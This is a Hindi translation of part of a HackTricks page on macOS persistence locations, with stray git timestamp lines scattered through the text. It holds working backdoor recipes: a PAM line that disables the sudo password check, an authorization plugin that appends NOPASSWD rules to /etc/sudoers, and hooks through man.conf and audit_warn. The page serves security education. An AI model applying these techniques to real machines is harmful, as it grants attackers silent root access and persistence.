आवधिक स्क्रिप्ट (**`/etc/periodic`**) को **launch daemons** के कारण निष्पादित किया जाता है जो `/System/Library/LaunchDaemons/com.apple.periodic*` में कॉन्फ़िगर किए गए हैं। ध्यान दें कि `/etc/periodic/` में संग्रहीत स्क्रिप्ट को **फाइल के मालिक** के रूप में **निष्पादित** किया जाता है, इसलिए यह संभावित विशेषाधिकार वृद्धि के लिए काम नहीं करेगा।
2023-09-28 20:05:35 +00:00
{% code overflow="wrap" %}
```bash
# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r-- 1 root wheel 887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r-- 1 root wheel 895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
-rw-r--r-- 1 root wheel 891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
# The scripts located in their locations
ls -lR /etc/periodic
total 0
drwxr-xr-x 11 root wheel 352 May 13 00:29 daily
drwxr-xr-x 5 root wheel 160 May 13 00:29 monthly
drwxr-xr-x 3 root wheel 96 May 13 00:29 weekly
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
/etc/periodic/daily:
total 72
-rwxr-xr-x 1 root wheel 1642 May 13 00:29 110.clean-tmps
-rwxr-xr-x 1 root wheel 695 May 13 00:29 130.clean-msgs
[...]
2023-06-01 21:09:46 +00:00
2023-09-28 20:05:35 +00:00
/etc/periodic/monthly:
total 24
-rwxr-xr-x 1 root wheel 888 May 13 00:29 199.rotate-fax
-rwxr-xr-x 1 root wheel 1010 May 13 00:29 200.accounting
-rwxr-xr-x 1 root wheel 606 May 13 00:29 999.local
2023-06-01 21:09:46 +00:00
2023-09-28 20:05:35 +00:00
/etc/periodic/weekly:
total 8
-rwxr-xr-x 1 root wheel 620 May 13 00:29 999.local
2023-06-01 21:09:46 +00:00
```
2024-02-07 07:34:51 +00:00
{% endcode %}
2024-09-21 18:25:44 +00:00
अन्य आवधिक स्क्रिप्ट हैं जो ** `/etc/defaults/periodic.conf` ** में निर्दिष्ट की गई हैं:
2023-06-01 21:09:46 +00:00
```bash
2023-09-28 20:05:35 +00:00
grep "Local scripts" /etc/defaults/periodic.conf
daily_local="/etc/daily.local" # Local scripts
weekly_local="/etc/weekly.local" # Local scripts
monthly_local="/etc/monthly.local" # Local scripts
2023-06-01 21:09:46 +00:00
```
2024-09-21 18:25:44 +00:00
यदि आप `/etc/daily.local` , `/etc/weekly.local` या `/etc/monthly.local` में से किसी भी फ़ाइल को लिखने में सफल होते हैं, तो यह **जल्द या बाद में निष्पादित होगा** ।
2023-09-28 15:09:34 +00:00
2023-11-02 16:52:21 +00:00
{% hint style="warning" %}
2024-09-21 18:25:44 +00:00
ध्यान दें कि आवधिक स्क्रिप्ट **स्क्रिप्ट के मालिक के रूप में निष्पादित होगी** । इसलिए यदि एक नियमित उपयोगकर्ता स्क्रिप्ट का मालिक है, तो यह उस उपयोगकर्ता के रूप में निष्पादित होगी (यह विशेषाधिकार वृद्धि हमलों को रोक सकता है)।
2023-11-02 16:52:21 +00:00
{% endhint %}
2023-09-28 20:05:35 +00:00
### PAM
2023-09-28 15:09:34 +00:00
2024-02-07 07:34:51 +00:00
Writeup: [Linux Hacktricks PAM ](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md )\
Writeup: [https://theevilbit.github.io/beyond/beyond\_0005/ ](https://theevilbit.github.io/beyond/beyond\_0005/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [🟠 ](https://emojipedia.org/large-orange-circle )
* लेकिन आपको रूट होना आवश्यक है
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
* हमेशा रूट की आवश्यकता होती है
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### विवरण और शोषण
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
चूंकि PAM **स्थिरता** और मैलवेयर पर अधिक केंद्रित है, जो macOS के अंदर आसान निष्पादन पर है, यह ब्लॉग इस तकनीक को बेहतर ढंग से समझने के लिए विस्तृत व्याख्या नहीं देगा, **इस तकनीक को बेहतर समझने के लिए लेखों को पढ़ें** ।
2023-11-02 16:52:21 +00:00
2024-09-21 18:25:44 +00:00
PAM मॉड्यूल की जांच करें:
2023-11-02 16:52:21 +00:00
```bash
ls -l /etc/pam.d
```
2024-09-21 18:25:44 +00:00
एक स्थायीता/अधिकार वृद्धि तकनीक जो PAM का दुरुपयोग करती है, उतनी ही आसान है जितनी कि मॉड्यूल /etc/pam.d/sudo को संशोधित करना और शुरुआत में यह पंक्ति जोड़ना:
2023-11-02 16:52:21 +00:00
```bash
auth sufficient pam_permit.so
```
2024-09-21 18:25:44 +00:00
तो यह **इस तरह** कुछ ऐसा दिखेगा:
2023-11-02 16:52:21 +00:00
```bash
# sudo: auth account password session
auth sufficient pam_permit.so
auth include sudo_local
auth sufficient pam_smartcard.so
auth required pam_opendirectory.so
account required pam_permit.so
password required pam_deny.so
session required pam_permit.so
```
2024-09-21 18:25:44 +00:00
और इसलिए ** `sudo` का उपयोग करने का कोई भी प्रयास काम करेगा**।
2023-11-02 16:52:21 +00:00
{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
ध्यान दें कि यह निर्देशिका TCC द्वारा सुरक्षित है, इसलिए यह अत्यधिक संभावना है कि उपयोगकर्ता को पहुंच के लिए एक प्रॉम्प्ट मिलेगा।
2023-11-02 16:52:21 +00:00
{% endhint %}
2024-09-21 18:25:44 +00:00
एक और अच्छा उदाहरण su है, जहाँ आप देख सकते हैं कि PAM मॉड्यूल को पैरामीटर देना भी संभव है (और आप इस फ़ाइल को भी बैकडोर कर सकते हैं):
```bash
cat /etc/pam.d/su
# su: auth account session
auth sufficient pam_rootok.so
auth required pam_opendirectory.so
account required pam_group.so no_warn group=admin,wheel ruser root_only fail_safe
account required pam_opendirectory.so no_check_shell
password required pam_opendirectory.so
session required pam_launchd.so
```
### Authorization Plugins
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/ ](https://theevilbit.github.io/beyond/beyond\_0028/ )\
Writeup: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65 ](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65 )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [🟠 ](https://emojipedia.org/large-orange-circle )
2024-02-07 07:34:51 +00:00
* लेकिन आपको रूट होना चाहिए और अतिरिक्त कॉन्फ़िगरेशन करनी होगी
2023-12-30 01:27:36 +00:00
* TCC बायपास: ???
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
#### Location
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
* `/Library/Security/SecurityAgentPlugins/`
2024-09-21 18:25:44 +00:00
* रूट की आवश्यकता
* प्लगइन का उपयोग करने के लिए प्राधिकरण डेटाबेस को कॉन्फ़िगर करना भी आवश्यक है
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
#### Description & Exploitation
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
आप एक प्राधिकरण प्लगइन बना सकते हैं जो तब निष्पादित होगा जब एक उपयोगकर्ता लॉग-इन करता है ताकि स्थिरता बनाए रखी जा सके। इन प्लगइनों में से एक बनाने के बारे में अधिक जानकारी के लिए पिछले लेखों की जांच करें (और सावधान रहें, एक खराब तरीके से लिखा गया प्लगइन आपको लॉक कर सकता है और आपको अपने मैक को रिकवरी मोड से साफ़ करना होगा)।
2023-11-03 11:03:53 +00:00
```objectivec
// Compile the code and create a real bundle
// gcc -bundle -framework Foundation main.m -o CustomAuth
// mkdir -p CustomAuth.bundle/Contents/MacOS
// mv CustomAuth CustomAuth.bundle/Contents/MacOS/
#import <Foundation/Foundation.h>
__attribute__((constructor)) static void run()
{
2023-11-06 08:38:02 +00:00
NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded");
system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers");
2023-11-03 11:03:53 +00:00
}
```
2024-09-21 18:25:44 +00:00
**स्थानांतरित करें** बंडल को उस स्थान पर लोड करने के लिए:
2023-11-03 11:03:53 +00:00
```bash
cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/
```
2024-09-21 18:25:44 +00:00
अंत में इस प्लगइन को लोड करने के लिए **नियम** जोड़ें:
2023-11-03 11:03:53 +00:00
```bash
cat > /tmp/rule.plist < < EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
2023-11-06 08:38:02 +00:00
< key > class< / key >
< string > evaluate-mechanisms< / string >
< key > mechanisms< / key >
< array >
< string > CustomAuth:login,privileged< / string >
< / array >
< / dict >
2023-11-03 11:03:53 +00:00
< / plist >
EOF
security authorizationdb write com.asdf.asdf < /tmp/rule.plist
```
2024-09-21 18:25:44 +00:00
**`evaluate-mechanisms`** यह अधिकृतता ढांचे को बताएगा कि इसे **अधिकृतता के लिए एक बाहरी तंत्र को कॉल करने की आवश्यकता होगी** । इसके अलावा, ** `privileged` ** इसे रूट द्वारा निष्पादित करेगा।
2023-12-16 15:25:38 +00:00
2023-11-06 08:38:02 +00:00
इसे ट्रिगर करें:
2023-11-03 11:03:53 +00:00
```bash
security authorize com.asdf.asdf
```
2024-09-21 18:25:44 +00:00
और फिर **स्टाफ समूह को sudo** एक्सेस होना चाहिए (पुष्टि करने के लिए `/etc/sudoers` पढ़ें)।
2023-11-03 11:03:53 +00:00
2023-09-28 20:05:35 +00:00
### Man.conf
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0030/ ](https://theevilbit.github.io/beyond/beyond\_0030/ )
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [🟠 ](https://emojipedia.org/large-orange-circle )
* लेकिन आपको रूट होना चाहिए और उपयोगकर्ता को मैन का उपयोग करना चाहिए
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
* **`/private/etc/man.conf`**
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
* **`/private/etc/man.conf`**: जब भी मैन का उपयोग किया जाता है
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
#### विवरण और शोषण
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
कॉन्फ़िग फ़ाइल ** `/private/etc/man.conf` ** यह संकेत करती है कि मैन दस्तावेज़ फ़ाइलें खोलते समय कौन सा बाइनरी/स्क्रिप्ट का उपयोग करना है। इसलिए निष्पादन योग्य का पथ संशोधित किया जा सकता है ताकि जब भी उपयोगकर्ता कुछ दस्तावेज़ पढ़ने के लिए मैन का उपयोग करे, एक बैकडोर निष्पादित हो।
2023-06-01 21:09:46 +00:00
2023-11-06 08:38:02 +00:00
उदाहरण के लिए ** `/private/etc/man.conf` ** में सेट करें:
2023-09-28 20:05:35 +00:00
```
MANPAGER /tmp/view
2023-06-01 21:09:46 +00:00
```
2024-09-21 18:25:44 +00:00
और फिर `/tmp/view` बनाएं:
2023-06-01 21:09:46 +00:00
```bash
2023-09-28 20:05:35 +00:00
#!/bin/zsh
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
touch /tmp/manconf
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
/usr/bin/less -s
```
2023-09-28 15:09:34 +00:00
### Apache2
2024-09-21 18:25:44 +00:00
**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0023/ ](https://theevilbit.github.io/beyond/beyond\_0023/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [🟠 ](https://emojipedia.org/large-orange-circle )
* लेकिन आपको रूट होना चाहिए और अपाचे चल रहा होना चाहिए
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
* Httpd के पास अधिकार नहीं हैं
2023-09-28 20:05:35 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
* **`/etc/apache2/httpd.conf`**
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
2024-02-07 07:34:51 +00:00
* ट्रिगर: जब Apache2 शुरू होता है
2023-09-28 15:09:34 +00:00
2024-07-18 18:53:16 +00:00
#### विवरण और शोषण
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
आप `/etc/apache2/httpd.conf` में एक लाइन जोड़कर एक मॉड्यूल लोड करने का संकेत दे सकते हैं जैसे:
{% code overflow="wrap" %}
2023-09-28 15:09:34 +00:00
```bash
LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"
```
{% endcode %}
2024-09-21 18:25:44 +00:00
इस तरह आपका संकलित मॉड्यूल Apache द्वारा लोड किया जाएगा। केवल एक बात है कि या तो आपको इसे **एक मान्य Apple प्रमाणपत्र के साथ साइन करना होगा** , या आपको **सिस्टम में एक नया विश्वसनीय प्रमाणपत्र जोड़ना होगा** और इसे **इसके साथ साइन करना होगा** ।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
फिर, यदि आवश्यक हो, तो यह सुनिश्चित करने के लिए कि सर्वर शुरू होगा, आप निष्पादित कर सकते हैं:
2023-09-28 15:09:34 +00:00
```bash
sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist
```
2024-09-21 18:25:44 +00:00
Dylb के लिए कोड उदाहरण:
2023-09-28 15:09:34 +00:00
```objectivec
#include <stdio.h>
#include <syslog.h>
__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
2023-11-06 08:38:02 +00:00
printf("[+] dylib constructor called from %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
2023-09-28 15:09:34 +00:00
}
```
2024-09-21 18:25:44 +00:00
### BSM ऑडिट ढांचा
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0031/ ](https://theevilbit.github.io/beyond/beyond\_0031/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [🟠 ](https://emojipedia.org/large-orange-circle )
* लेकिन आपको रूट होना चाहिए, auditd चल रहा होना चाहिए और एक चेतावनी उत्पन्न करनी चाहिए
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:05:35 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
* **`/etc/security/audit_warn`**
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
* **प्रेरक**: जब auditd एक चेतावनी का पता लगाता है
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
#### विवरण और शोषण
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
जब भी auditd एक चेतावनी का पता लगाता है, स्क्रिप्ट ** `/etc/security/audit_warn` ** **चलायी जाती** है। इसलिए आप इसमें अपना पेलोड जोड़ सकते हैं।
2023-09-28 15:09:34 +00:00
```bash
echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn
2023-06-01 21:09:46 +00:00
```
2024-09-21 18:25:44 +00:00
आप `sudo audit -n` के साथ एक चेतावनी मजबूर कर सकते हैं।
### स्टार्टअप आइटम
2023-06-01 21:09:46 +00:00
2023-09-26 23:39:35 +00:00
{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
**यह अप्रचलित है, इसलिए उन निर्देशिकाओं में कुछ नहीं मिलना चाहिए।**
2023-09-26 23:39:35 +00:00
{% endhint %}
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
**StartupItem** एक निर्देशिका है जो `/Library/StartupItems/` या `/System/Library/StartupItems/` में स्थित होनी चाहिए। एक बार यह निर्देशिका स्थापित हो जाने के बाद, इसमें दो विशेष फ़ाइलें होनी चाहिए:
2024-02-07 07:34:51 +00:00
2024-09-21 18:25:44 +00:00
1. एक **rc स्क्रिप्ट** : एक शेल स्क्रिप्ट जो स्टार्टअप पर निष्पादित होती है।
2. एक **plist फ़ाइल** , विशेष रूप से `StartupParameters.plist` नाम की, जिसमें विभिन्न कॉन्फ़िगरेशन सेटिंग्स होती हैं।
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
सुनिश्चित करें कि दोनों rc स्क्रिप्ट और `StartupParameters.plist` फ़ाइल **StartupItem** निर्देशिका के अंदर सही तरीके से रखी गई हैं ताकि स्टार्टअप प्रक्रिया उन्हें पहचान सके और उनका उपयोग कर सके।
2023-06-01 21:09:46 +00:00
{% tabs %}
{% tab title="StartupParameters.plist" %}
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
2023-11-06 08:38:02 +00:00
< key > Description< / key >
< string > This is a description of this service< / string >
< key > OrderPreference< / key >
< string > None< / string > <!-- Other req services to execute before this -->
< key > Provides< / key >
< array >
< string > superservicename< / string > <!-- Name of the services provided by this file -->
< / array >
2023-06-01 21:09:46 +00:00
< / dict >
< / plist >
```
2023-12-26 03:49:11 +00:00
{% endtab %}
2024-09-21 18:25:44 +00:00
{% tab title="सुपरसेविका नाम" %}
2023-06-01 21:09:46 +00:00
```bash
#!/bin/sh
. /etc/rc.common
StartService(){
2023-11-06 08:38:02 +00:00
touch /tmp/superservicestarted
2023-06-01 21:09:46 +00:00
}
StopService(){
2023-11-06 08:38:02 +00:00
rm /tmp/superservicestarted
2023-06-01 21:09:46 +00:00
}
RestartService(){
2023-11-06 08:38:02 +00:00
echo "Restarting"
2023-06-01 21:09:46 +00:00
}
RunService "$1"
```
2024-07-17 18:49:06 +00:00
{% endtab %}
{% endtabs %}
2024-02-08 23:20:46 +00:00
### ~~emond~~
2023-09-28 20:05:35 +00:00
{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
मैं अपने macOS में इस घटक को नहीं ढूंढ पा रहा हूँ, इसलिए अधिक जानकारी के लिए लेख को देखें
2023-09-28 20:05:35 +00:00
{% endhint %}
2024-09-21 18:25:44 +00:00
लेख: [https://theevilbit.github.io/beyond/beyond\_0023/ ](https://theevilbit.github.io/beyond/beyond\_0023/ )
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
Apple द्वारा पेश किया गया, **emond** एक लॉगिंग तंत्र है जो अधूरे या संभवतः छोड़ दिए गए प्रतीत होता है, फिर भी यह सुलभ है। जबकि यह एक Mac प्रशासक के लिए विशेष रूप से लाभकारी नहीं है, यह अस्पष्ट सेवा खतरे के अभिनेताओं के लिए एक सूक्ष्म स्थायी विधि के रूप में कार्य कर सकती है, जो संभवतः अधिकांश macOS प्रशासकों द्वारा अनदेखी रह जाएगी।
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
जो लोग इसके अस्तित्व से अवगत हैं, उनके लिए **emond** के किसी भी दुर्भावनापूर्ण उपयोग की पहचान करना सीधा है। इस सेवा के लिए सिस्टम का LaunchDaemon एक ही निर्देशिका में निष्पादित करने के लिए स्क्रिप्ट की तलाश करता है। इसे निरीक्षण करने के लिए, निम्नलिखित कमांड का उपयोग किया जा सकता है:
2023-09-28 20:05:35 +00:00
```bash
ls -l /private/var/db/emondClients
```
### ~~XQuartz~~
2024-02-07 07:34:51 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0018/ ](https://theevilbit.github.io/beyond/beyond\_0018/ )
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### Location
2023-09-28 20:05:35 +00:00
* **`/opt/X11/etc/X11/xinit/privileged_startx.d`**
2024-09-21 18:25:44 +00:00
* रूट की आवश्यकता है
* **Trigger**: XQuartz के साथ
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### Description & Exploit
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
XQuartz **अब macOS में स्थापित नहीं है** , इसलिए यदि आप अधिक जानकारी चाहते हैं तो लेख को देखें।
2023-09-28 20:05:35 +00:00
### ~~kext~~
{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
kext को रूट के रूप में स्थापित करना इतना जटिल है कि मैं इसे सैंडबॉक्स से बचने या यहां तक कि स्थिरता के लिए भी नहीं मानूंगा (जब तक कि आपके पास एक एक्सप्लॉइट न हो)
2023-09-28 20:05:35 +00:00
{% endhint %}
2024-09-21 18:25:44 +00:00
#### Location
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
एक KEXT को स्टार्टअप आइटम के रूप में स्थापित करने के लिए, इसे **निम्नलिखित स्थानों में से एक में स्थापित किया जाना चाहिए** :
2023-09-28 20:05:35 +00:00
* `/System/Library/Extensions`
2024-09-21 18:25:44 +00:00
* KEXT फ़ाइलें OS X ऑपरेटिंग सिस्टम में निर्मित।
2023-09-28 20:05:35 +00:00
* `/Library/Extensions`
2024-09-21 18:25:44 +00:00
* KEXT फ़ाइलें 3rd पार्टी सॉफ़्टवेयर द्वारा स्थापित की गईं
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
आप वर्तमान में लोड की गई kext फ़ाइलों को सूचीबद्ध कर सकते हैं:
2023-09-28 20:05:35 +00:00
```bash
kextstat #List loaded kext
kextload /path/to/kext.kext #Load a new one based on path
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
kextunload /path/to/kext.kext
kextunload -b com.apple.driver.ExampleBundle
```
2024-09-21 18:25:44 +00:00
For more information about [**kernel extensions check this section** ](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers ).
2024-07-18 18:53:16 +00:00
2023-09-28 20:05:35 +00:00
### ~~amstoold~~
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0029/ ](https://theevilbit.github.io/beyond/beyond\_0029/ )
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### Location
2023-09-28 20:05:35 +00:00
* **`/usr/local/bin/amstoold`**
2023-12-26 03:49:11 +00:00
* रूट की आवश्यकता है
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### Description & Exploitation
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
स्पष्ट रूप से `/System/Library/LaunchAgents/com.apple.amstoold.plist` से `plist` इस बाइनरी का उपयोग कर रहा था जबकि एक XPC सेवा को उजागर कर रहा था... बात यह है कि बाइनरी मौजूद नहीं थी, इसलिए आप वहां कुछ रख सकते हैं और जब XPC सेवा को कॉल किया जाएगा, तो आपकी बाइनरी को कॉल किया जाएगा।
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
मैं अब इसे अपने macOS में नहीं ढूंढ पा रहा हूँ।
2023-09-28 20:05:35 +00:00
### ~~xsanctl~~
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0015/ ](https://theevilbit.github.io/beyond/beyond\_0015/ )
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### Location
2023-09-28 20:05:35 +00:00
* **`/Library/Preferences/Xsan/.xsanrc`**
2023-12-26 03:49:11 +00:00
* रूट की आवश्यकता है
2024-09-21 18:25:44 +00:00
* **Trigger**: जब सेवा चलाई जाती है (कभी-कभी)
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### Description & exploit
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
स्पष्ट रूप से इस स्क्रिप्ट को चलाना बहुत सामान्य नहीं है और मैं इसे अपने macOS में भी नहीं ढूंढ सका, इसलिए यदि आप अधिक जानकारी चाहते हैं तो लेखन देखें।
2023-09-28 20:05:35 +00:00
### ~~/etc/rc.common~~
2023-06-01 21:09:46 +00:00
{% hint style="danger" %}
2023-12-26 03:49:11 +00:00
**यह आधुनिक MacOS संस्करणों में काम नहीं कर रहा है**
2023-06-01 21:09:46 +00:00
{% endhint %}
2024-09-21 18:25:44 +00:00
यहां **कमांड्स रखना भी संभव है जो स्टार्टअप पर निष्पादित होंगे।** उदाहरण के लिए नियमित rc.common स्क्रिप्ट:
2023-06-01 21:09:46 +00:00
```bash
#
# Common setup for startup scripts.
#
# Copyright 1998-2002 Apple Computer, Inc.
#
######################
# Configure the shell #
######################
#
# Be strict
#
#set -e
set -u
#
# Set command search path
#
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH
#
# Set the terminal mode
#
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
# TERM=$(tset - -Q); export TERM
#fi
###################
# Useful functions #
###################
#
# Determine if the network is up by looking for any non-loopback
# internet network interfaces.
#
CheckForNetwork()
{
2023-11-06 08:38:02 +00:00
local test
if [ -z "${NETWORKUP:=}" ]; then
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
if [ "${test}" -gt 0 ]; then
NETWORKUP="-YES-"
else
NETWORKUP="-NO-"
fi
fi
2023-06-01 21:09:46 +00:00
}
alias ConsoleMessage=echo
#
# Process management
#
GetPID ()
{
2023-11-06 08:38:02 +00:00
local program="$1"
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
local pid=""
if [ -f "${pidfile}" ]; then
pid=$(head -1 "${pidfile}")
if ! kill -0 "${pid}" 2> /dev/null; then
echo "Bad pid file $pidfile; deleting."
pid=""
rm -f "${pidfile}"
fi
fi
if [ -n "${pid}" ]; then
echo "${pid}"
return 0
else
return 1
fi
2023-06-01 21:09:46 +00:00
}
#
# Generic action handler
#
RunService ()
{
2023-11-06 08:38:02 +00:00
case $1 in
start ) StartService ;;
stop ) StopService ;;
restart) RestartService ;;
* ) echo "$0: unknown argument: $1";;
esac
2023-06-01 21:09:46 +00:00
}
```
2024-09-21 18:25:44 +00:00
## स्थायी तकनीकें और उपकरण
2023-06-01 21:09:46 +00:00
* [https://github.com/cedowens/Persistent-Swift ](https://github.com/cedowens/Persistent-Swift )
* [https://github.com/D00MFist/PersistentJXA ](https://github.com/D00MFist/PersistentJXA )
2024-07-18 18:53:16 +00:00
{% hint style="success" %}
2024-09-21 18:25:44 +00:00
सीखें और AWS हैकिंग का अभ्यास करें:< img src = "../.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "../.gitbook/assets/arte.png" alt = "" data-size = "line" > \
सीखें और GCP हैकिंग का अभ्यास करें: < img src = "../.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "../.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2023-06-01 21:09:46 +00:00
2024-07-18 18:53:16 +00:00
< details >
2023-12-31 04:18:31 +00:00
2024-09-21 18:25:44 +00:00
< summary > HackTricks का समर्थन करें< / summary >
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
* [**सदस्यता योजनाएँ** ](https://github.com/sponsors/carlospolop ) देखें!
* **हमारे** 💬 [**Discord समूह** ](https://discord.gg/hRep4RUj7f ) या [**telegram समूह** ](https://t.me/peass ) में शामिल हों या **Twitter** 🐦 पर हमें **फॉलो करें** [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **हैकिंग ट्रिक्स साझा करें और** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) और [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) गिटहब रिपोजिटरी में PR सबमिट करें।
2023-06-01 21:09:46 +00:00
< / details >
2024-07-18 18:53:16 +00:00
{% endhint %}